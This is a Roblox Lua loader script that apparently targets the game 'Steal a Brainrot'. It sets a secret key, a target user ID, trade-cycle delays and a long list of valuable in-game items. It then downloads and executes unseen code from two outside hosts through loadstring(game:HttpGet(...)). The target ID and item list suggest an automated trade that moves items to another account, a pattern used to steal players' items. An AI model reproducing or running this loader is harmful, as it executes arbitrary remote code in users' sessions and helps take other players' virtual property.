getgenv().SECRET_KEY = "mrr_7c3500b9060d42858a28518923a7646e"
getgenv().TARGET_ID = 8768215613
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true,
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["La Supreme Combinasion"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Love Love Bear"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Capitano Moby"] = true,
    ["Cooki and Milki"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["La Secret Combinasion"] = true,
    ["La Casa Boo"] = true,
    ["Spooky and Pumpky"] = true,
    ["Garama and Madundung"] = true,
    ["Festive 67"] = true,
    ["Ginger Gerat"] = true,
    ["Nacho Spyder"] = true,
    ["Antonio"] = true,
    ["La Food Combinasion"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Signore Carapace"] = true,
    ["Elefanto Frigo"] = true,
    ["Bunny and Eggy"] = true,
    ["Hydra Bunny"] = true,
    ["Arcadragon"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["Pancake and Syrup"] = true,
    ["Foxini Lanternini"] = true,
    ["Los Sekolahs"] = true,
    ["Cash or Card"] = true,
    ["La Ginger Sekolah"] = true,
    ["Sammyni Fattini"] = true,
    ["Los Spaghettis"] = true,
    ["Ventoliero Pavonero"] = true,
    ["Cloverat Clapat"] = true,
    ["Spaghetti Tualetti"] = true,
    ["La Easter Grande"] = true,
    ["Rosetti Tualetti"] = true,
    ["Fishino Clownino"] = true,
    ["Gold Gold Gold"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Lavadorito Spinito"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Rico Dinero"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Orcaledon"] = true,
    ["Tictac Sahur"] = true,
    ["La Taco Combinasion"] = true,
    ["Ketupat Kepat"] = true,
    ["Dug dug dug"] = true,
    ["Tang Tang Keletang"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["W or L"] = true,
    ["Esok Sekolah"] = true,
    ["La Jolly Grande"] = true,
    ["Los Mariachis"] = true,
    ["Los Cupids"] = true,
    ["Los Puggies"] = true,
    ["Tralaledon"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Tuff Toucan"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Money Money Reindeer"] = true,
    ["La Spooky Grande"] = true,
    ["Los Bros"] = true,
    ["La Extinct Grande"] = true,
    ["Los Candies"] = true,
    ["Money Money Puggy"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Los Planitos"] = true,
    ["Las Sis"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Los Sweethearts"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Swag Soda"] = true,
    ["Noo my Gold"] = true,
    ["Tacorillo Crocodillo"] = true,
    ["Donkeyturbo Express"] = true,
    ["Guest 666"] = true,
    ["Pot Pumpkin"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/dadas45845/limitedhublph/refs/heads/main/morreira"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://vss.pandadevelopment.net/virtual/file/cab8fb76e91046c8"))()
end)
